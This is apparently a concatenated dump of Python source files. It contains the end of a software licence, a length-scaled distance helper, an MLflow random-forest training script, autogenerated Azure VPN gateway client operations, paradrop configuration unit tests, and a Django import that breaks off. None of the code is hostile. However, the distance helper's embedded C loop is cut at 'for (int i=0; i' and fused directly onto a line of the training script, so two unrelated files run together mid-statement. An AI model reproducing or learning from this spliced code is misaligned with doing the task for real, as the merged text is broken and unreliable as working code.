Agreement or its Institution’s use of the Software except to the\n# extent caused by the gross negligence or willful misconduct of\n# Harvard, Toronto or Sherbrooke or Socpra. This indemnification\n# provision shall survive expiration or termination of this Agreement.\n#\n# 11. GOVERNING LAW. This Agreement shall be construed and governed by\n# the laws of the Commonwealth of Massachusetts regardless of\n# otherwise applicable choice of law standards.\n#\n# 12. NON-USE OF NAME. 
Nothing in this License and Terms of Use shall\n# be construed as granting End Users or their Institutions any rights\n# or licenses to use any trademarks, service marks or logos associated\n# with the Software. You may not use the terms “Harvard” or\n# “University of Toronto” or “Université de Sherbrooke” or “Socpra\n# Sciences et Génie S.E.C.” (or a substantially similar term) in any\n# way that is inconsistent with the permitted uses described\n# herein. You agree not to use any name or emblem of Harvard, Toronto\n# or Sherbrooke, or any of their subdivisions for any purpose, or to\n# falsely suggest any relationship between End User (or its\n# Institution) and Harvard, Toronto and/or Sherbrooke, or in any\n# manner that would infringe or violate any of their rights.\n#\n# 13. End User represents and warrants that it has the legal authority\n# to enter into this License and Terms of Use on behalf of itself and\n# its Institution.\n\n\nimport numpy as np\n#import scipy.weave\nfrom scipy.spatial.distance import cdist\n\ndef dist2(ls, x1, x2=None):\n # Assumes NxD and MxD matrices.\n # Compute the squared distance matrix, given length scales.\n \n if x2 is None:\n # Find distance with self for x1.\n\n # Rescale.\n xx1 = x1 / ls \n xx2 = xx1\n\n else:\n # Rescale.\n xx1 = x1 / ls\n xx2 = x2 / ls\n \n r2 = cdist(xx1,xx2,'sqeuclidean')\n\n return r2\n\ndef grad_dist2(ls, x1, x2=None):\n if x2 is None:\n x2 = x1\n \n # Rescale.\n x1 = x1 / ls\n x2 = x2 / ls\n \n N = x1.shape[0]\n M = x2.shape[0]\n D = x1.shape[1]\n gX = np.zeros((x1.shape[0],x2.shape[0],x1.shape[1]))\n\n code = \\\n \"\"\"\n for (int i=0; i environment.yaml\")\n autocommit(file_paths=['./'], message='Another version of random forest')\n mlflow.set_tracking_uri(TRACKING_URI)\n mlflow.set_experiment(EXPERIMENT_NAME)\n\n digits = datasets.load_digits()\n\n n_samples = len(digits.images)\n X = digits.images.reshape((n_samples, -1))\n y = digits.target\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.8, random_state=SEED)\n\n # Track hash of data & split\n data_hash = hashlib.md5()\n for df in [X_train, X_test, y_train, y_test]:\n data_hash.update(df)\n data_hash = data_hash.hexdigest()\n\n clf = RandomForestClassifier(**cfg, random_state=SEED)\n clf.fit(X_train, y_train)\n preds = clf.predict(X_test)\n\n scores = classification_report(y_test, preds, output_dict=True)\n\n df = pd.json_normalize(scores, sep='_')\n df = df.to_dict(orient='records')[0]\n\n with mlflow.start_run():\n mlflow.log_params(cfg)\n mlflow.log_param('data_hash', data_hash)\n mlflow.log_metrics(df)\n print(df['macro avg_f1-score'])\n\n\nif __name__ == '__main__':\n cfg = {'n_estimators': 500,\n 'max_depth': 25,\n 'min_samples_split': 2,\n 'min_samples_leaf': 1,\n }\n train(cfg)\n"} {"ext": "py", "sha": "1a2f869ec2c812dfb0a9d1d33b95a16c250ea5fe", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
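# A small sketch (not from the original package) of how a length-scaled squared
# distance like the dist2() helper defined earlier is typically consumed:
# exponentiating it into a squared-exponential covariance matrix. The amplitude
# and length-scale values below are made up for illustration.
import numpy as np
from scipy.spatial.distance import cdist

def sqexp_kernel(ls, amp2, x1, x2=None):
    xx1 = x1 / ls
    xx2 = xx1 if x2 is None else x2 / ls
    r2 = cdist(xx1, xx2, 'sqeuclidean')  # the same quantity dist2() returns
    return amp2 * np.exp(-0.5 * r2)

# K = sqexp_kernel(np.array([0.5, 2.0]), 1.0, np.random.randn(5, 2))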
See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\nfrom typing import TYPE_CHECKING\nimport warnings\n\nfrom azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error\nfrom azure.core.paging import ItemPaged\nfrom azure.core.pipeline import PipelineResponse\nfrom azure.core.pipeline.transport import HttpRequest, HttpResponse\nfrom azure.core.polling import LROPoller, NoPolling, PollingMethod\nfrom azure.mgmt.core.exceptions import ARMErrorFormat\nfrom azure.mgmt.core.polling.arm_polling import ARMPolling\n\nfrom .. import models\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union\n\n T = TypeVar('T')\n ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]\n\nclass VpnGatewaysOperations(object):\n \"\"\"VpnGatewaysOperations operations.\n\n You should not instantiate this class directly. Instead, you should create a Client instance that\n instantiates it for you and attaches it as an attribute.\n\n :ivar models: Alias to model classes used in this operation group.\n :type models: ~azure.mgmt.network.v2020_03_01.models\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An object model deserializer.\n \"\"\"\n\n models = models\n\n def __init__(self, client, config, serializer, deserializer):\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n self._config = config\n\n def get(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> \"models.VpnGateway\"\n \"\"\"Retrieves the details of a virtual wan vpn gateway.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: VpnGateway, or the result of cls(response)\n :rtype: ~azure.mgmt.network.v2020_03_01.models.VpnGateway\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self.get.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def _create_or_update_initial(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n vpn_gateway_parameters, # type: \"models.VpnGateway\"\n **kwargs # type: Any\n ):\n # type: (...) 
-> \"models.VpnGateway\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n content_type = kwargs.pop(\"content_type\", \"application/json\")\n accept = \"application/json\"\n\n # Construct URL\n url = self._create_or_update_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Content-Type'] = self._serialize.header(\"content_type\", content_type, 'str')\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n body_content_kwargs = {} # type: Dict[str, Any]\n body_content = self._serialize.body(vpn_gateway_parameters, 'VpnGateway')\n body_content_kwargs['content'] = body_content\n request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 201]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if response.status_code == 200:\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if response.status_code == 201:\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def begin_create_or_update(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n vpn_gateway_parameters, # type: \"models.VpnGateway\"\n **kwargs # type: Any\n ):\n # type: (...) 
-> LROPoller[\"models.VpnGateway\"]\n \"\"\"Creates a virtual wan vpn gateway if it doesn't exist else updates the existing gateway.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :param vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan vpn\n gateway.\n :type vpn_gateway_parameters: ~azure.mgmt.network.v2020_03_01.models.VpnGateway\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.PollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)\n :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_03_01.models.VpnGateway]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = self._create_or_update_initial(\n resource_group_name=resource_group_name,\n gateway_name=gateway_name,\n vpn_gateway_parameters=vpn_gateway_parameters,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)\n elif polling is False: polling_method = NoPolling()\n else: polling_method = polling\n if cont_token:\n return LROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return LROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def update_tags(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n vpn_gateway_parameters, # type: \"models.TagsObject\"\n **kwargs # type: Any\n ):\n # type: (...) 
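# A minimal usage sketch for the operations above. Assumptions not shown in
# this file: credentials come from azure-identity, the operations hang off the
# standard NetworkManagementClient, and the resource names/gateway body are
# illustrative only (a real VpnGateway needs more properties, e.g. a virtual hub).
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.network.v2020_03_01.models import VpnGateway

def create_then_fetch(subscription_id):
    client = NetworkManagementClient(DefaultAzureCredential(), subscription_id)
    poller = client.vpn_gateways.begin_create_or_update(
        resource_group_name="example-rg",
        gateway_name="example-vpn-gw",
        vpn_gateway_parameters=VpnGateway(location="westus2"),
    )
    created = poller.result()  # LROPoller.result() blocks until provisioning finishes
    return client.vpn_gateways.get("example-rg", "example-vpn-gw")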
-> \"models.VpnGateway\"\n \"\"\"Updates virtual wan vpn gateway tags.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :param vpn_gateway_parameters: Parameters supplied to update a virtual wan vpn gateway tags.\n :type vpn_gateway_parameters: ~azure.mgmt.network.v2020_03_01.models.TagsObject\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: VpnGateway, or the result of cls(response)\n :rtype: ~azure.mgmt.network.v2020_03_01.models.VpnGateway\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n content_type = kwargs.pop(\"content_type\", \"application/json\")\n accept = \"application/json\"\n\n # Construct URL\n url = self.update_tags.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Content-Type'] = self._serialize.header(\"content_type\", content_type, 'str')\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n body_content_kwargs = {} # type: Dict[str, Any]\n body_content = self._serialize.body(vpn_gateway_parameters, 'TagsObject')\n body_content_kwargs['content'] = body_content\n request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def _delete_initial(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> None\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self._delete_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.delete(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 202, 204]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if cls:\n return cls(pipeline_response, None, {})\n\n _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def begin_delete(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> LROPoller[None]\n \"\"\"Deletes a virtual wan vpn gateway.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.PollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of LROPoller that returns either None or the result of cls(response)\n :rtype: ~azure.core.polling.LROPoller[None]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = self._delete_initial(\n resource_group_name=resource_group_name,\n gateway_name=gateway_name,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n if cls:\n return cls(pipeline_response, None, {})\n\n if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)\n elif polling is False: polling_method = NoPolling()\n else: polling_method = polling\n if cont_token:\n return LROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return LROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def _reset_initial(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> Optional[\"models.VpnGateway\"]\n cls = kwargs.pop('cls', None) # type: ClsType[Optional[\"models.VpnGateway\"]]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self._reset_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.post(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 202]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = None\n if response.status_code == 200:\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n _reset_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore\n\n def begin_reset(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> LROPoller[\"models.VpnGateway\"]\n \"\"\"Resets the primary of the vpn gateway in the specified resource group.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.PollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)\n :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_03_01.models.VpnGateway]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = self._reset_initial(\n resource_group_name=resource_group_name,\n gateway_name=gateway_name,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)\n elif polling is False: polling_method = NoPolling()\n else: polling_method = polling\n if cont_token:\n return LROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return LROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_reset.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore\n\n def list_by_resource_group(\n self,\n resource_group_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> Iterable[\"models.ListVpnGatewaysResult\"]\n \"\"\"Lists all the VpnGateways in a resource group.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)\n :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.ListVpnGatewaysResult]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.ListVpnGatewaysResult\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n def prepare_request(next_link=None):\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n if not next_link:\n # Construct URL\n url = self.list_by_resource_group.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n else:\n url = next_link\n query_parameters = {} # type: Dict[str, Any]\n request = self._client.get(url, query_parameters, header_parameters)\n return request\n\n def extract_data(pipeline_response):\n deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)\n list_of_elem = deserialized.value\n if cls:\n list_of_elem = cls(list_of_elem)\n return deserialized.next_link or None, iter(list_of_elem)\n\n def get_next(next_link=None):\n request = prepare_request(next_link)\n\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n return pipeline_response\n\n return ItemPaged(\n get_next, extract_data\n )\n list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways'} # type: ignore\n\n def list(\n self,\n **kwargs # type: Any\n ):\n # type: (...) 
-> Iterable[\"models.ListVpnGatewaysResult\"]\n \"\"\"Lists all the VpnGateways in a subscription.\n\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)\n :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.ListVpnGatewaysResult]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.ListVpnGatewaysResult\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n def prepare_request(next_link=None):\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n if not next_link:\n # Construct URL\n url = self.list.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n else:\n url = next_link\n query_parameters = {} # type: Dict[str, Any]\n request = self._client.get(url, query_parameters, header_parameters)\n return request\n\n def extract_data(pipeline_response):\n deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)\n list_of_elem = deserialized.value\n if cls:\n list_of_elem = cls(list_of_elem)\n return deserialized.next_link or None, iter(list_of_elem)\n\n def get_next(next_link=None):\n request = prepare_request(next_link)\n\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n return pipeline_response\n\n return ItemPaged(\n get_next, extract_data\n )\n list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways'} # type: ignore\n"} {"ext": "py", "sha": "1a2f86cf170f003f6765598b13c57e6737eec197", "content": "import os\nimport shutil\n\nfrom nose.tools import assert_raises\nfrom paradrop.lib.utils import pdos, pdosq\nfrom paradrop.base import nexus, settings\n\n\nclass TestingNexus(nexus.NexusBase):\n pass\n\n\ndef setup():\n settings.loadSettings(mode=\"unittest\")\n\n\ndef teardown():\n pdos.remove(settings.CONFIG_HOME_DIR)\n\n\n###############################################################################\n# Settings Assignment, Paths\n###############################################################################\n\n\ndef testMetaAssignment():\n nex = TestingNexus()\n assert nex.info.version == 1\n\n\ndef testConfigLoadingEmpty():\n nex = TestingNexus()\n assert nex.info.pdid == None\n\n\ndef testConfigLoadingExisting():\n contents = dict(pdid='pd.damouse.aardvark', version=1, pdserver='http://paradrop.org', wampRouter='ws://paradrop.org:9080/ws')\n nexus.writeYaml(contents, settings.CONFIG_FILE)\n\n nex = TestingNexus()\n assert nex.info.pdid == 
'pd.damouse.aardvark'\n assert nex.info.pdserver == 'http://paradrop.org'\n assert nex.info.wampRouter == 'ws://paradrop.org:9080/ws'\n pdos.remove(settings.CONFIG_FILE)\n\n\n###############################################################################\n# AttrWrapper\n###############################################################################\n\ndef testWrapperDoesntAllowChanges():\n wrapper = nexus.AttrWrapper()\n\n wrapper.a = 1\n assert wrapper.a == 1\n\n def s():\n wrapper._lock()\n wrapper.a = 2\n\n assert_raises(AttributeError, s)\n\n###############################################################################\n# Setings Changes\n###############################################################################\n\n\ndef testSaveCallbackTriggered():\n class Receiver:\n\n def __init__(self):\n self.received = False\n\n def onChange(self, k, v):\n self.received = True\n\n rec = Receiver()\n\n wrapper = nexus.AttrWrapper()\n wrapper.a = 1\n\n wrapper.setOnChange(rec.onChange)\n\n wrapper.a = 2\n\n assert wrapper.a == 2\n assert rec.received == True\n\n\ndef testSaveUpdatesYaml():\n nex = TestingNexus()\n nex.info.a = 1\n\n dic = pdosq.read_yaml_file(settings.CONFIG_FILE)\n assert dic['a'] == 1\n\n"} {"ext": "py", "sha": "1a2f8873b884c3ec3c3e0535fbe94b19ca1bf26e", "content": "from django.core.exceptions import 